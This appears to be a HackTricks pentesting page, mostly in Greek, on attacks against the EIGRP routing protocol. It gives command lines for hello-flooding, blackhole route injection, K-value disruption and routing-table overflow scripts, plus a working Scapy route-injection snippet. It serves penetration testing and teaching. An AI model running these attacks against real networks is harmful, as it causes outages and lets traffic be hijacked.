EIGRP Επιθέσεις
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
Αυτό είναι μια σύνοψη των επιθέσεων που εκτέθηκαν στο https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Ελέγξτε το για περισσότερες πληροφορίες.
Fake EIGRP Neighbors Attack
- Objective: Να υπερφορτωθούν οι CPU των δρομολογητών πλημμυρίζοντάς τους με EIGRP hello packets, ενδεχομένως οδηγώντας σε Denial of Service (DoS).
- Tool: helloflooding.py script.
- Execution:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
- Parameters:
--interface: Καθορίζει τη δικτυακή διεπαφή, π.χ.eth0.--as: Ορίζει τον αριθμό του EIGRP autonomous system, π.χ.1.--subnet: Θέτει το subnet, π.χ.10.10.100.0/24.
EIGRP Blackhole Attack
- Objective: Να διαταραχθεί η ροή της κυκλοφορίας δικτύου εισάγοντας μια ψευδή διαδρομή, οδηγώντας σε blackhole όπου η κίνηση κατευθύνεται σε ανύπαρκτο προορισμό.
- Tool: routeinject.py script.
- Execution:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
- Parameters:
--interface: Καθορίζει τη διεπαφή του συστήματος του επιτιθέμενου.--as: Ορίζει τον αριθμό του EIGRP AS.--src: Θέτει τη διεύθυνση IP του επιτιθέμενου.--dst: Θέτει τη διεύθυνση IP του στοχευόμενου subnet.--prefix: Ορίζει τη μάσκα του στοχευόμενου subnet IP.
Abusing K-Values Attack
- Objective: Να προκληθούν συνεχείς διακοπές και επανασυνδέσεις εντός του EIGRP domain εισάγοντας τροποποιημένα K-values, οδηγώντας ουσιαστικά σε DoS.
- Tool: relationshipnightmare.py script.
- Execution:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
- Parameters:
--interface: Καθορίζει τη δικτυακή διεπαφή.--as: Ορίζει τον αριθμό του EIGRP AS.--src: Θέτει τη διεύθυνση IP ενός νόμιμου δρομολογητή.
Routing Table Overflow Attack
- Objective: Να επιβαρυνθεί η CPU και η RAM του δρομολογητή πλημμυρίζοντας τον πίνακα δρομολόγησης με πολλές ψευδείς διαδρομές.
- Tool: routingtableoverflow.py script.
- Execution:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
- Parameters:
--interface: Καθορίζει τη δικτυακή διεπαφή.--as: Ορίζει τον αριθμό του EIGRP AS.--src: Θέτει τη διεύθυνση IP του επιτιθέμενου.
Protocol Notes Useful for Attacks
- HELLO packets carry K-values and neighbors only form when they match. Αυτό αποτελεί τη βάση για τις επιθέσεις K-value mismatch/relationship disruption και για τον λόγο που τα mismatched K-values αποτρέπουν την adjacency.
- The PARAMETER TLV (Type 0x0001) in HELLO (and initial UPDATE) carries K-values and Hold Time, οπότε οι passive captures αποκαλύπτουν τις ακριβείς τιμές που χρησιμοποιούνται στο segment.
Scapy Packet Crafting (Route Injection / Fake Neighbors)
Scapy ships an EIGRP contrib layer with TLVs like EIGRPParam and EIGRPIntRoute, which is enough to craft UPDATEs for route injection. Example adapted from the davidbombal/scapy EIGRP route injection script:
from scapy.all import *
load_contrib("eigrp")
sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))
Το ίδιο repo περιλαμβάνει γρήγορα “fake neighbor” scripts που sniff ένα πραγματικό EIGRP πακέτο και το replay-άρουν με spoofed source IP για να δημιουργήσουν phantom neighbors (χρήσιμο για CPU/neighbor-table pressure).
- Scapy EIGRP contrib docs: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
- Example scripts: https://github.com/davidbombal/scapy
Routopsy & NSE Helpers
- Routopsy δημιουργεί ένα εργαστήριο επίθεσης virtual-router (FRRouting + Scapy) και περιλαμβάνει DRP attacks που μπορείτε να προσαρμόσετε για EIGRP tests. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
- Το NSE του Nmap έχει μια μικρή βιβλιοθήκη
eigrpγια ανάλυση/δημιουργία ενός υποσυνόλου των EIGRP πακέτων. https://nmap.org/nsedoc/lib/eigrp.html
Authentication Recon
- Ο EIGRP named mode υποστηρίζει HMAC-SHA-256 authentication μέσω
authentication mode hmac-sha-256 .... Αν είναι ενεργοποιημένο, τα crafted packets πρέπει να είναι authenticated με το σωστό κλειδί· αν δεν είναι, το spoofing/injection είναι ευκολότερο.
References
- https://www.rfc-editor.org/rfc/rfc7868.html
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.


